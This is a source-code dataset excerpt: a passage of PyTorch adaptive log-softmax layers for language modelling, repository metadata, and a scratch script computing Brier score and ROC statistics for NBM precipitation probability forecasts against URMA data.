hidden :: [len*bsz x d_proj]
target :: [len*bsz]
"""
if hidden.size(0) != target.size(0):
raise RuntimeError(
"Input and target should have the same size " "in the batch dimension."
)
if self.n_clusters == 0:
logit = self._compute_logit(
hidden,
self.out_layers[0].weight,
self.out_layers[0].bias,
self.out_projs[0],
)
all_probs = F.softmax(logit, dim=-1)
probs, words = torch.topk(all_probs, k=50, dim=-1)
else:
# construct weights and biases
weights, biases = [], []
for i in range(len(self.cutoffs)):
if self.div_val == 1:
l_idx, r_idx = self.cutoff_ends[i], self.cutoff_ends[i + 1]
weight_i = self.out_layers[0].weight[l_idx:r_idx]
bias_i = self.out_layers[0].bias[l_idx:r_idx]
else:
weight_i = self.out_layers[i].weight
bias_i = self.out_layers[i].bias
if i == 0:
weight_i = torch.cat([weight_i, self.cluster_weight], dim=0)
bias_i = torch.cat([bias_i, self.cluster_bias], dim=0)
weights.append(weight_i)
biases.append(bias_i)
head_weight, head_bias, head_proj = weights[0], biases[0], self.out_projs[0]
head_logit = self._compute_logit(hidden, head_weight, head_bias, head_proj)
# head_logit[:,0] = -float('inf')
# head softmax
head_probs = F.softmax(head_logit, dim=1)
head_argmax = torch.argmax(head_probs, dim=1)
head_n_words = head_weight.size()[0] - self.n_clusters
# cutoff_values=[0,1000,50000,100000]
cutoff_values = [0] + self.cutoffs
words = torch.zeros(
size=(hidden.size()[0], 50), dtype=torch.long, device=hidden.device
)
probs = torch.zeros(size=(hidden.size()[0], 50), device=hidden.device)
for i in range(len(cutoff_values) - 1):
if i == 0:
cluster_i_indices = torch.nonzero(
head_argmax < head_n_words
).squeeze()
cluster_i_probs = head_probs.index_select(0, cluster_i_indices)[
:, : -self.n_clusters
]
cluster_i_probs, cluster_i_words = torch.topk(
cluster_i_probs, k=50, dim=-1
)
probs.index_copy_(0, cluster_i_indices, cluster_i_probs)
words.index_copy_(0, cluster_i_indices, cluster_i_words)
else:
cluster_i_indices = torch.nonzero(
head_argmax == (head_n_words + i - 1)
).squeeze()
hidden_i = hidden.index_select(0, cluster_i_indices)
weight_i, bias_i, proj_i = weights[i], biases[i], self.out_projs[i]
cluster_logit_i = self._compute_logit(
hidden_i, weight_i, bias_i, proj_i
)
cluster_i_probs = F.softmax(cluster_logit_i, dim=1)
cluster_i_probs, cluster_i_words = torch.topk(
cluster_i_probs, k=50, dim=-1
)
probs.index_copy_(0, cluster_i_indices, cluster_i_probs)
words.index_copy_(0, cluster_i_indices, cluster_i_words)
return words, probs
def get_all_props(self, hidden, target, keep_order=False):
"""
hidden :: [len*bsz x d_proj]
target :: [len*bsz]
"""
if hidden.size(0) != target.size(0):
raise RuntimeError(
"Input and target should have the same size " "in the batch dimension."
)
if self.n_clusters == 0:
logit = self._compute_logit(
hidden,
self.out_layers[0].weight,
self.out_layers[0].bias,
self.out_projs[0],
)
all_probs = F.softmax(logit, dim=-1)
else:
# construct weights and biases
weights, biases = [], []
for i in range(len(self.cutoffs)):
if self.div_val == 1:
l_idx, r_idx = self.cutoff_ends[i], self.cutoff_ends[i + 1]
weight_i = self.out_layers[0].weight[l_idx:r_idx]
bias_i = self.out_layers[0].bias[l_idx:r_idx]
else:
weight_i = self.out_layers[i].weight
bias_i = self.out_layers[i].bias
if i == 0:
weight_i = torch.cat([weight_i, self.cluster_weight], dim=0)
bias_i = torch.cat([bias_i, self.cluster_bias], dim=0)
weights.append(weight_i)
biases.append(bias_i)
head_weight, head_bias, head_proj = weights[0], biases[0], self.out_projs[0]
head_logit = self._compute_logit(hidden, head_weight, head_bias, head_proj)
# head_logit[:,0] = -float('inf')
# head softmax
head_probs = F.softmax(head_logit, dim=1)
cutoff_values = [0] + self.cutoffs
all_probs = torch.zeros(
size=(hidden.size()[0], self.out_layers[0].weight.size()[0]),
dtype=torch.float,
device=hidden.device,
)
for i in range(len(cutoff_values) - 1):
l_idx, r_idx = cutoff_values[i], cutoff_values[i + 1]
mask_i = (target >= l_idx) & (target < r_idx)
indices_i = mask_i.nonzero().squeeze()
temp_prob = torch.zeros(
size=(indices_i.size()[0], all_probs.size()[1]),
dtype=torch.float,
device=hidden.device,
)
if i == 0:
cluster_i_probs = head_probs.index_select(0, indices_i)[
:, : -self.n_clusters
]
else:
hidden_i = hidden.index_select(0, indices_i)
weight_i, bias_i, proj_i = weights[i], biases[i], self.out_projs[i]
cluster_logit_i = self._compute_logit(
hidden_i, weight_i, bias_i, proj_i
)
cluster_i_probs = F.softmax(cluster_logit_i, dim=1)
temp_prob.index_copy_(
1,
torch.range(
l_idx, r_idx - 1, dtype=torch.long, device=hidden.device
).squeeze(),
cluster_i_probs,
)
all_probs.index_copy_(0, indices_i, temp_prob)
all_probs = all_probs.cpu()
return all_probs
class ClassedProjectedAdaptiveLogSoftmax(nn.Module):
def __init__(
self,
n_token,
d_embed,
d_proj,
cutoffs,
div_val=1,
keep_order=False,
cl_all_root_index=None,
cl_all_leaf_index=None,
word2class=None,
):
super(ClassedProjectedAdaptiveLogSoftmax, self).__init__()
self.n_token = n_token
self.d_embed = d_embed
self.d_proj = d_proj
self.cutoffs = cutoffs + [n_token]
self.cutoff_ends = [0] + self.cutoffs
self.div_val = div_val
self.learn_offset = True if word2class else False
self.word2class = word2class
self.cl_all_root_index = cl_all_root_index
self.cl_all_leaf_index = cl_all_leaf_index
self.shortlist_size = self.cutoffs[0]
self.n_clusters = len(self.cutoffs) - 1
self.head_size = self.shortlist_size + self.n_clusters
self.nll_loss = nn.CrossEntropyLoss(reduction='none')
# self.remove_root = []
# self.remove_leaf = []
# self.remove_root_and_leaf = []
if self.n_clusters > 0:
self.cluster_weight = nn.Parameter(
torch.zeros(self.n_clusters, self.d_embed)
)
self.cluster_bias = nn.Parameter(torch.zeros(self.n_clusters))
for i in range(len(self.cutoffs)):
l_idx, r_idx = self.cutoff_ends[i], self.cutoff_ends[i + 1]
cur_length = r_idx-l_idx
if i == 0:
cur_length+=(len(self.cutoffs)-1)
root_index = [index - l_idx
for index in self.cl_all_root_index
if index < r_idx and index >= l_idx]
leaf_index = [
index - l_idx
for index in self.cl_all_leaf_index
if index < r_idx and index >= l_idx
]
# self.register_buffer('remove_root_{}'.format(i), torch.zeros(cur_length).index_fill_(0, torch.tensor(root_index),float("inf")))
# self.register_buffer('remove_leaf_{}'.format(i), torch.zeros(cur_length).index_fill_(0, torch.tensor(leaf_index),float("inf")))
# self.register_buffer('remove_root_and_leaf_{}'.format(i), torch.zeros(cur_length).index_fill_(0, torch.tensor(root_index+leaf_index),float("inf")))
self.register_buffer('remove_root_{}'.format(i), torch.ones(cur_length).index_fill_(0, torch.tensor(root_index),float(0)))
self.register_buffer('remove_leaf_{}'.format(i), torch.ones(cur_length).index_fill_(0, torch.tensor(leaf_index),float(0)))
self.register_buffer('remove_root_and_leaf_{}'.format(i), torch.ones(cur_length).index_fill_(0, torch.tensor(root_index+leaf_index),float(0)))
else:
i=0
# self.register_buffer('remove_root_{}'.format(i), torch.zeros(n_token).index_fill_(0, torch.tensor(cl_all_root_index),float("inf")))
# self.register_buffer('remove_leaf_{}'.format(i), torch.zeros(n_token).index_fill_(0, torch.tensor(cl_all_leaf_index),float("inf")))
# self.register_buffer('remove_root_and_leaf_{}'.format(i), torch.zeros(n_token).index_fill_(0, torch.tensor(cl_all_root_index+cl_all_leaf_index),float("inf")))
self.register_buffer('remove_root_{}'.format(i), torch.ones(n_token).index_fill_(0, torch.tensor(cl_all_root_index),float(0)))
self.register_buffer('remove_leaf_{}'.format(i), torch.ones(n_token).index_fill_(0, torch.tensor(cl_all_leaf_index),float(0)))
self.register_buffer('remove_root_and_leaf_{}'.format(i), torch.ones(n_token).index_fill_(0, torch.tensor(cl_all_root_index+cl_all_leaf_index),0))
self.out_layers = nn.ModuleList()
self.proj_flag = False
if div_val == 1:
if d_proj != d_embed:
self.proj_flag=True
self.out_layers.append(nn.Sequential(nn.Linear(d_proj, d_embed, bias=False),nn.Linear(d_embed, n_token)))
else:
self.out_layers.append(nn.Sequential(nn.Linear(d_embed, n_token)))
else:
self.proj_flag=True
for i in range(len(self.cutoffs)):
l_idx, r_idx = self.cutoff_ends[i], self.cutoff_ends[i + 1]
d_emb_i = d_embed // (div_val ** i)
self.out_layers.append(nn.Sequential(nn.Linear(d_proj, d_emb_i, bias=False),nn.Linear(d_emb_i, r_idx - l_idx)))
self.keep_order = keep_order
def _compute_logit(self, hidden, weight, bias, proj):
if proj is None:
logit = F.linear(hidden, weight, bias=bias)
else:
# if CUDA_MAJOR <= 9 and CUDA_MINOR <= 1:
proj_hid = F.linear(hidden, proj.t().contiguous())
logit = F.linear(proj_hid, weight, bias=bias)
# else:
# logit = torch.einsum('bd,de,ev->bv', (hidden, proj, weight.t()))
# if bias is not None:
# logit = logit + bias
return logit
def forward(
self,
hidden,
target,
keep_order=True,
predict_root=False,
general_words_only=False,
):
"""
hidden :: [len*bsz x d_proj]
target :: [len*bsz]
predict_root: True for class label + general words; False for normal LM
separate_vocab: True for general words only
"""
if hidden.size(0) != target.size(0):
raise RuntimeError(
"Input and target should have the same size " "in the batch dimension."
)
if self.n_clusters == 0:
logit = self.out_layers[0](hidden)
if predict_root:
# logit = logit - getattr(self, 'remove_leaf_{}'.format(0))
logit = logit + (getattr(self, 'remove_leaf_{}'.format(0)) + 1e-45).log()
else:
# logit = logit - getattr(self, 'remove_root_{}'.format(0))
logit = logit + (getattr(self, 'remove_root_{}'.format(0)) + 1e-45).log()
if general_words_only:
# logit = logit - getattr(self, 'remove_root_and_leaf_{}'.format(0))
logit = logit + (getattr(self, 'remove_root_and_leaf_{}'.format(0)) + 1e-45).log()
nll = (
-F.log_softmax(logit, dim=-1).gather(1, target.unsqueeze(1)).squeeze(1)
)
else:
# construct weights and biases
weights, biases, projs = [], [], []
for i in range(len(self.cutoffs)):
if self.div_val == 1:
l_idx, r_idx = self.cutoff_ends[i], self.cutoff_ends[i + 1]
weight_i = self.out_layers[0][-1].weight[l_idx:r_idx]
bias_i = self.out_layers[0][-1].bias[l_idx:r_idx]
if self.proj_flag:
projs_i = self.out_layers[0][0].weight
else:
projs_i = None
else:
weight_i = self.out_layers[i][-1].weight
bias_i = self.out_layers[i][-1].bias
projs_i = self.out_layers[i][0].weight
if i == 0:
weight_i = torch.cat([weight_i, self.cluster_weight], dim=0)
bias_i = torch.cat([bias_i, self.cluster_bias], dim=0)
weights.append(weight_i)
biases.append(bias_i)
projs.append(projs_i)
head_weight, head_bias, head_proj = weights[0], biases[0], projs[0]
head_logit = self._compute_logit(hidden, head_weight, head_bias, head_proj)
if predict_root:
# head_logit = head_logit - getattr(self, 'remove_leaf_{}'.format(0))
head_logit = head_logit + (getattr(self, 'remove_leaf_{}'.format(0)) + 1e-45).log()
else:
# head_logit = head_logit - getattr(self, 'remove_root_{}'.format(0))
head_logit = head_logit + (getattr(self, 'remove_root_{}'.format(0)) + 1e-45).log()
if general_words_only:
# head_logit = head_logit - getattr(self, 'remove_root_and_leaf_{}'.format(0))
head_logit = head_logit + (getattr(self, 'remove_root_and_leaf_{}'.format(0)) + 1e-45).log()
# head_logit[:,0] = -float('inf')
head_logprob = F.log_softmax(head_logit, dim=1)
nll = torch.zeros_like(target, dtype=torch.float32, device=hidden.device)
offset = 0
cutoff_values = [0] + self.cutoffs
for i in range(len(cutoff_values) - 1):
l_idx, r_idx = cutoff_values[i], cutoff_values[i + 1]
mask_i = (target >= l_idx) & (target < r_idx)
indices_i = mask_i.nonzero().squeeze()
if indices_i.numel() == 0:
continue
target_i = target.index_select(0, indices_i) - l_idx
head_logprob_i = head_logprob.index_select(0, indices_i)
if i == 0:
logprob_i = self.nll_loss(head_logit.index_select(0, indices_i).float(), target_i)
# logprob_i = head_logprob_i.gather(1, target_i[:, None]).squeeze(1)
else:
weight_i, bias_i, proj_i = weights[i], biases[i], projs[i]
hidden_i = hidden.index_select(0, indices_i)
tail_logit_i = self._compute_logit(
hidden_i, weight_i, bias_i, proj_i
)
if predict_root:
# tail_logit_i -= getattr(self, 'remove_leaf_{}'.format(i))
tail_logit_i = tail_logit_i + (getattr(self, 'remove_leaf_{}'.format(i)) + 1e-45).log()
else:
# tail_logit_i -= getattr(self, 'remove_root_{}'.format(i))
tail_logit_i = tail_logit_i + (getattr(self, 'remove_root_{}'.format(i)) + 1e-45).log()
if general_words_only:
# tail_logit_i -= getattr(self, 'remove_root_and_leaf_{}'.format(i))
tail_logit_i = tail_logit_i + (getattr(self, 'remove_root_and_leaf_{}'.format(i)) + 1e-45).log()
logprob_i = self.nll_loss(tail_logit_i.float(), target_i) - head_logprob_i[:, -i]
if (hasattr(self, "keep_order") and self.keep_order) or keep_order:
nll.index_copy_(0, indices_i, logprob_i)
else:
nll[offset : offset + logprob_i.size(0)].copy_(logprob_i)
offset += logprob_i.size(0)
# if sum(nll==0).item()>0:
# print('error')
return nll
def get_top_k_words_and_props(
self,
hidden,
target,
keep_order=True,
predict_root=False,
general_words_only=False,
top_k=500,
):
"""
hidden :: [len*bsz x d_proj]
target :: [len*bsz]
"""
if hidden.size(0) != target.size(0):
raise RuntimeError(
"Input and target should have the same size " "in the batch dimension."
)
if self.n_clusters == 0:
logit = self.out_layers[0](hidden)
if predict_root:
logit = logit - getattr(self, 'remove_leaf_{}'.format(0))
else:
logit = logit - getattr(self, 'remove_root_{}'.format(0))
if general_words_only:
logit = logit - getattr(self, 'remove_root_and_leaf_{}'.format(0))
all_probs = F.softmax(logit, dim=-1)
if top_k==-1:
return all_probs
probs, words = torch.topk(all_probs, k=top_k, dim=-1)
else:
# construct weights and biases
weights, biases, projs = [], [], []
for i in range(len(self.cutoffs)):
if self.div_val == 1:
l_idx, r_idx = self.cutoff_ends[i], self.cutoff_ends[i + 1]
weight_i = self.out_layers[0][-1].weight[l_idx:r_idx]
bias_i = self.out_layers[0][-1].bias[l_idx:r_idx]
if self.proj_flag:
projs_i = self.out_layers[0][0].weight
else:
projs_i = None
else:
weight_i = self.out_layers[i][-1].weight
bias_i = self.out_layers[i][-1].bias
projs_i = self.out_layers[i][0].weight
if i == 0:
weight_i = torch.cat([weight_i, self.cluster_weight], dim=0)
bias_i = torch.cat([bias_i, self.cluster_bias], dim=0)
weights.append(weight_i)
biases.append(bias_i)
projs.append(projs_i)
head_weight, head_bias, head_proj = weights[0], biases[0], projs[0]
head_logit = self._compute_logit(hidden, head_weight, head_bias, head_proj)
head_logit = head_logit-getattr(self, 'remove_leaf_{}'.format(0))
head_logprob = F.log_softmax(head_logit, dim=1)
words = torch.zeros(
size=(hidden.size()[0], self.n_token),
dtype=torch.long,
device=hidden.device,
)
probs = torch.zeros(
size=(hidden.size()[0], self.n_token), device=hidden.device
)
offset = 0
cutoff_values = [0] + self.cutoffs
for i in range(len(cutoff_values) - 1):
l_idx, r_idx = cutoff_values[i], cutoff_values[i + 1]
if i == 0:
probs[:,l_idx:r_idx] = head_logprob[:,l_idx:r_idx]
else:
weight_i, bias_i, proj_i = weights[i], biases[i], projs[i]
tail_logit_i = self._compute_logit(hidden, weight_i, bias_i, proj_i)
tail_logit_i -= getattr(self, 'remove_root_{}'.format(i))
tail_logprob_i = F.log_softmax(tail_logit_i, dim=1)
logprob_i = head_logprob[:, -i].unsqueeze(1) + tail_logprob_i
probs[:,l_idx:r_idx] = logprob_i
if top_k==-1:
# logprob
return probs
topk_probs, topk_words = torch.topk(
probs, k=top_k, dim=-1
)
return topk_words, topk_probs
class HeriarchicalClassedProjectedAdaptiveLogSoftmax(nn.Module):
def __init__(
self,
n_token,
d_embed,
d_proj,
cutoffs,
div_val=1,
keep_order=False,
cl_root_leaf_dict=None,
):
super(HeriarchicalClassedProjectedAdaptiveLogSoftmax, self).__init__()
self.n_token = n_token
self.d_embed = d_embed
self.d_proj = d_proj
# here we assume 1 token only map to 1 class
# vocab : [c1] [c2] [t1] [t2] [t3] | [t_l1] [t_l2] | [t_l3] |
# cutoff: [20000, 20002, 20003, ..., XXXXX, 200000, ]
cl_all_root_index = []
cl_all_leaf_index = []
cutoffs = [20000]
for k, v in cl_root_leaf_dict.items():
cutoffs.append(cutoffs[-1] + len(v))
cl_all_root_index.append(k)
cl_all_leaf_index.extend(v)
cutoffs.append(200000)
self.cutoffs = cutoffs + [n_token]
# cutoff: [20000, 20002, 20003, ..., XXXXX, 200000, n_token]
self.cutoff_ends = [0] + self.cutoffs
self.div_val = div_val
self.cl_all_root_index = cl_all_root_index
self.cl_all_leaf_index = cl_all_leaf_index
self.n_clusters = len(self.cutoffs) - 1 - len(cl_all_root_index)
if self.n_clusters > 0:
self.cluster_weight = nn.Parameter(
torch.zeros(self.n_clusters, self.d_embed)
)
self.cluster_bias = nn.Parameter(torch.zeros(self.n_clusters))
# self.cl_cutoffs_root_index = []
# self.cl_cutoffs_leaf_index = []
# for i in range(len(self.cutoffs)):
# l_idx, r_idx = self.cutoff_ends[i], self.cutoff_ends[i+1]
# self.cl_cutoffs_root_index.append(
# [index-l_idx for index in self.cl_all_root_index if index < r_idx and index >= l_idx])
# self.cl_cutoffs_leaf_index.append(
# [index-l_idx for index in self.cl_all_leaf_index if index < r_idx and index >= l_idx])
self.out_layers = nn.ModuleList()
self.out_projs = nn.ParameterList()
if div_val == 1:
for i in range(len(self.cutoffs)):
if d_proj != d_embed:
self.out_projs.append(nn.Parameter(torch.Tensor(d_proj, d_embed)))
else:
self.out_projs.append(None)
self.out_layers.append(nn.Linear(d_embed, n_token))
else:
for i in range(len(self.cutoffs)):
l_idx, r_idx = self.cutoff_ends[i], self.cutoff_ends[i + 1]
d_emb_i = d_embed // (div_val ** i)
self.out_projs.append(nn.Parameter(torch.Tensor(d_proj, d_emb_i)))
self.out_layers.append(nn.Linear(d_emb_i, r_idx - l_idx))
self.keep_order = keep_order
def _compute_logit(self, hidden, weight, bias, proj):
if proj is None:
logit = F.linear(hidden, weight, bias=bias)
else:
# if CUDA_MAJOR <= 9 and CUDA_MINOR <= 1:
proj_hid = F.linear(hidden, proj.t().contiguous())
logit = F.linear(proj_hid, weight, bias=bias)
# else:
# logit = torch.einsum('bd,de,ev->bv', (hidden, proj, weight.t()))
# if bias is not None:
# logit = logit + bias
return logit
def forward(
self,
hidden,
target,
keep_order=True,
predict_root=False,
general_words_only=False,
):
"""
hidden :: [len*bsz x d_proj]
target :: [len*bsz]
predict_root: True for class label + general words; False for normal LM
separate_vocab: True for general words only
"""
if hidden.size(0) != target.size(0):
raise RuntimeError(
"Input and target should have the same size " "in the batch dimension."
)
if self.n_clusters == 0:
logit = self._compute_logit(
hidden,
self.out_layers[0].weight,
self.out_layers[0].bias,
self.out_projs[0],
)
if predict_root:
logit[:, self.cl_all_leaf_index] = -float("inf")
else:
logit[:, self.cl_all_root_index] = -float("inf")
if general_words_only:
logit[:, self.cl_all_leaf_index + self.cl_all_root_index] = -float(
"inf"
)
nll = (
-F.log_softmax(logit, dim=-1).gather(1, target.unsqueeze(1)).squeeze(1)
)
else:
# construct weights and biases
weights, biases = [], []
for i in range(len(self.cutoffs)):
if self.div_val == 1:
l_idx, r_idx = self.cutoff_ends[i], self.cutoff_ends[i + 1]
weight_i = self.out_layers[0].weight[l_idx:r_idx]
bias_i = self.out_layers[0].bias[l_idx:r_idx]
else:
weight_i = self.out_layers[i].weight
bias_i = self.out_layers[i].bias
if i == 0:
weight_i = torch.cat([weight_i, self.cluster_weight], dim=0)
bias_i = torch.cat([bias_i, self.cluster_bias], dim=0)
weights.append(weight_i)
biases.append(bias_i)
head_weight, head_bias, head_proj = weights[0], biases[0], self.out_projs[0]
# head_leaf_index, head_root_index = self.cl_cutoffs_leaf_index[
# 0], self.cl_cutoffs_root_index[0]
head_logit = self._compute_logit(hidden, head_weight, head_bias, head_proj)
# head_logit[:,0] = -float('inf')
head_logprob = F.log_softmax(head_logit, dim=1)
nll = torch.zeros_like(target, dtype=hidden.dtype, device=hidden.device)
offset = 0
cutoff_values = [0] + self.cutoffs
for i in range(len(cutoff_values) - 1):
l_idx, r_idx = cutoff_values[i], cutoff_values[i + 1]
mask_i = (target >= l_idx) & (target < r_idx)
indices_i = mask_i.nonzero().squeeze()
if indices_i.numel() == 0:
continue
target_i = target.index_select(0, indices_i) - l_idx
head_logprob_i = head_logprob.index_select(0, indices_i)
if i == 0:
logprob_i = head_logprob_i.gather(1, target_i[:, None]).squeeze(1)
else:
weight_i, bias_i, proj_i = weights[i], biases[i], self.out_projs[i]
hidden_i = hidden.index_select(0, indices_i)
tail_logit_i = self._compute_logit(
hidden_i, weight_i, bias_i, proj_i
)
tail_logprob_i = F.log_softmax(tail_logit_i, dim=1)
j = (
i - 1
if i <= len(self.cl_all_root_index)
else -(i - len(self.cl_all_root_index))
)
logprob_i = head_logprob_i[:, j] + tail_logprob_i.gather(
1, target_i[:, None]
).squeeze(1)
if (hasattr(self, "keep_order") and self.keep_order) or keep_order:
nll.index_copy_(0, indices_i, -logprob_i)
else:
nll[offset : offset + logprob_i.size(0)].copy_(-logprob_i)
offset += logprob_i.size(0)
return nll | 41.603796 | 172 | 0.529254 | 4,402 | 35,072 | 3.929577 | 0.04657 | 0.027922 | 0.036825 | 0.014799 | 0.912822 | 0.887039 | 0.867557 | 0.848711 | 0.831715 | 0.815008 | 0 | 0.018995 | 0.359033 | 35,072 | 843 | 173 | 41.603796 | 0.750489 | 0.107579 | 0 | 0.750403 | 0 | 0 | 0.025038 | 0.004458 | 0 | 0 | 0 | 0 | 0 | 1 | 0.019324 | false | 0 | 0.008052 | 0 | 0.049919 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
14d2f831b2fd9362f245f11cb2054d5d3ef1b8e0 | 10,825 | py | Python | scraps/scripts_all/scrap.py | m-wessler/nbm-pqpf-deploy | ccc7a95d1e1cf7b264fafdc0da2bc1a2bc86f839 | [
"MIT"
] | null | null | null | scraps/scripts_all/scrap.py | m-wessler/nbm-pqpf-deploy | ccc7a95d1e1cf7b264fafdc0da2bc1a2bc86f839 | [
"MIT"
] | null | null | null | scraps/scripts_all/scrap.py | m-wessler/nbm-pqpf-deploy | ccc7a95d1e1cf7b264fafdc0da2bc1a2bc86f839 | [
"MIT"
] | null | null | null | def extract_pqpf_verif_stats(_fhr, _urma):
nbm_file = glob(nbm_dir + 'extract/nbm_probx_fhr%03d.nc'%_fhr)[0]
print(nbm_file)
# Subset the threshold value
nbm = xr.open_dataset(nbm_file)['probx'].sel(
y=slice(idx[0].min(), idx[0].max()),
x=slice(idx[1].min(), idx[1].max()))
# Subset the times
nbm_time = nbm.valid
urma_time = _urma.valid
time_match = nbm_time[np.in1d(nbm_time, urma_time)].values
time_match = np.array([t for t in time_match if pd.to_datetime(t) >= start_date])
time_match = np.array([t for t in time_match if pd.to_datetime(t) <= end_date])
date0 = pd.to_datetime(time_match[0]).strftime('%Y/%m/%d %H UTC')
date1 = pd.to_datetime(time_match[-1]).strftime('%Y/%m/%d %H UTC')
_nbm = nbm.sel(valid=time_match)
_urma = _urma.sel(valid=time_match)
nbm_mask, _nbm = xr.broadcast(mask, _nbm)
urma_mask, _urma = xr.broadcast(mask, _urma)
_nbm_masked = xr.where(nbm_mask, _nbm, np.nan)
_urma_masked = xr.where(urma_mask, _urma, np.nan)
data = []
for thresh in produce_thresholds:
print('Processing f%03d %.2f"'%(_fhr, thresh))
_nbm_masked_select = _nbm_masked.sel(threshold=thresh)/100
bins = np.arange(0, 101, 10)
N = xr.where(~np.isnan(_nbm_masked_select), 1, 0).sum()
n = xr.where(_urma_masked > thresh, 1, 0).sum()
o = n/N
uncertainty = o * (1 - o)
reliability_inner = []
resolution_inner = []
reliability_diagram = []
roc_diagram = []
for i, bounds in enumerate(zip(bins[:-1], bins[1:])):
left, right = np.array(bounds)/100
center = round(np.mean([left, right]), 2)
fk = xr.where((_nbm_masked_select > left) & (_nbm_masked_select <= right), _nbm_masked_select, np.nan)
nk = xr.where((_nbm_masked_select > left) & (_nbm_masked_select <= right), 1, 0).sum()
ok_count = xr.where((_nbm_masked_select > left) & (_nbm_masked_select <= right) & (_urma_masked > thresh), 1, 0).sum()
ok = ok_count/nk
# 3D 1D 3D 1D
_reliability_inner = nk * ((fk - ok)**2)
_reliability_inner['center'] = center
reliability_inner.append(_reliability_inner)
# 1D 1D 1D 1D
_resolution_inner = nk * ((ok - o)**2)
_resolution_inner['center'] = center
resolution_inner.append(_resolution_inner)
reliability_diagram.append([center, ok.values])
hit = xr.where((_nbm_masked_select > center) & (_urma_masked > thresh), 1, 0).sum(dim='valid')
false_alarm = xr.where((_nbm_masked_select > center) & (_urma_masked <= thresh), 1, 0).sum(dim='valid')
observed_yes = xr.where(_urma_masked > thresh, 1, 0).sum(dim='valid')
observed_no = xr.where(_urma_masked <= thresh, 1, 0).sum(dim='valid')
hit_rate = hit/observed_yes
false_alarm_rate = false_alarm/observed_no
roc_diagram.append([false_alarm_rate.mean().values, hit_rate.mean().values, center])
reliability_inner = xr.concat(reliability_inner, dim='center')
reliability_inner_condensed = xr.where(mask, reliability_inner.sum(dim='center'), np.nan)
reliability = (1/N) * reliability_inner_condensed
reliability = reliability.mean(dim='valid')
resolution = (1/N) * xr.concat(resolution_inner, dim='center').sum(dim='center')
brier = reliability - resolution + uncertainty
brier_score = brier.mean().values
brier_skill = 1 - (brier/o)
brier_skill_score = brier_skill.mean().values
brier = brier.rename('brier')
brier_skill = brier_skill.rename('brier_skill')
reliability_diagram = np.array(reliability_diagram).T
roc_diagram = np.array(roc_diagram).T
far = xr.DataArray(roc_diagram[0], dims={'center':roc_diagram[2]}, coords={'center':roc_diagram[2]})
hr = xr.DataArray(roc_diagram[1], dims={'center':roc_diagram[2]}, coords={'center':roc_diagram[2]})
data_merge = xr.merge([brier_skill])
# Need to figure out reliability scaling and add in here as (x, y)
data_merge['n_events'] = observed_yes
data_merge['hit_rate'] = hr
data_merge['false_alarm_rate'] = far
data.append(data_merge)
return xr.concat(data, dim='thresh')
##################
from scipy.integrate import simps
from sklearn.metrics import auc as auc_calc
from sklearn.metrics import roc_curve
def extract_pqpf_verif_stats(_fhr, _urma):
nbm_file = glob(nbm_dir + 'extract/nbm_probx_fhr%03d.nc'%_fhr)[0]
print(nbm_file)
# Subset the threshold value
nbm = xr.open_dataset(nbm_file)['probx'].sel(
y=slice(idx[0].min(), idx[0].max()),
x=slice(idx[1].min(), idx[1].max()))
# Subset the times
nbm_time = nbm.valid
urma_time = _urma.valid
time_match = nbm_time[np.in1d(nbm_time, urma_time)].values
time_match = np.array([t for t in time_match if pd.to_datetime(t) >= start_date])
time_match = np.array([t for t in time_match if pd.to_datetime(t) <= end_date])
date0 = pd.to_datetime(time_match[0]).strftime('%Y/%m/%d %H UTC')
date1 = pd.to_datetime(time_match[-1]).strftime('%Y/%m/%d %H UTC')
_nbm = nbm.sel(valid=time_match)
_urma = _urma.sel(valid=time_match)
nbm_mask, _nbm = xr.broadcast(mask, _nbm)
urma_mask, _urma = xr.broadcast(mask, _urma)
_nbm_masked = xr.where(nbm_mask, _nbm, np.nan)
_urma_masked = xr.where(urma_mask, _urma, np.nan)
data = []
for thresh in produce_thresholds[:3]:
print('Processing f%03d %.2f"'%(_fhr, thresh))
_nbm_masked_select = _nbm_masked.sel(threshold=thresh)/100
bins = np.arange(0, 101, 10)
N = xr.where(~np.isnan(_nbm_masked_select), 1, 0).sum()
n = xr.where(_urma_masked > thresh, 1, 0).sum()
o = n/N
uncertainty = o * (1 - o)
reliability_inner = []
resolution_inner = []
reliability_diagram = []
roc_diagram = []#[[1., 1., 1.]]
for i, bounds in enumerate(zip(bins[:-1], bins[1:])):
left, right = np.array(bounds)/100
center = round(np.mean([left, right]), 2)
fk = xr.where((_nbm_masked_select > left) & (_nbm_masked_select <= right), _nbm_masked_select, np.nan)
nk = xr.where((_nbm_masked_select > left) & (_nbm_masked_select <= right), 1, 0).sum()
ok_count = xr.where((_nbm_masked_select > left) & (_nbm_masked_select <= right) & (_urma_masked > thresh), 1, 0).sum()
ok = ok_count/nk
# 3D 1D 3D 1D
_reliability_inner = nk * ((fk - ok)**2)
_reliability_inner['center'] = center
reliability_inner.append(_reliability_inner)
# 1D 1D 1D 1D
_resolution_inner = nk * ((ok - o)**2)
_resolution_inner['center'] = center
resolution_inner.append(_resolution_inner)
#print(_fhr, thresh, center, np.round(ok.values, 3))
reliability_diagram.append([center, ok.values])
hit = xr.where((_nbm_masked_select > center) & (_urma_masked > thresh), 1, 0).sum(dim='valid')
false_alarm = xr.where((_nbm_masked_select > center) & (_urma_masked <= thresh), 1, 0).sum(dim='valid')
observed_yes = xr.where(_urma_masked > thresh, 1, 0).sum(dim='valid')
observed_no = xr.where(_urma_masked <= thresh, 1, 0).sum(dim='valid')
# print(center)
# print(hit.mean().values, observed_yes.mean().values)
# print(false_alarm.mean().values, observed_no.mean().values)
# print()
hit_rate = hit/observed_yes
false_alarm_rate = false_alarm/observed_no
roc_diagram.append([false_alarm_rate.mean().values, hit_rate.mean().values, center])
#roc_diagram.append([0., 0., 0.])
reliability_inner = xr.concat(reliability_inner, dim='center').sum(dim='center')
reliability_inner = xr.where(mask, reliability_inner, np.nan)
reliability = (1/N) * reliability_inner
reliability = reliability.mean(dim='valid')
#print('\nreli:', reliability.mean().values)
resolution = (1/N) * xr.concat(resolution_inner, dim='center').sum(dim='center')
#print('reso:', resolution.values)
brier = reliability - resolution + uncertainty
brier_score = brier.mean().values
#print('brier:', brier_score)
brier_skill = 1 - (brier/o)
brier_skill_score = brier_skill.mean().values
brier = brier.rename('brier')
brier_skill = brier_skill.rename('brier_skill')
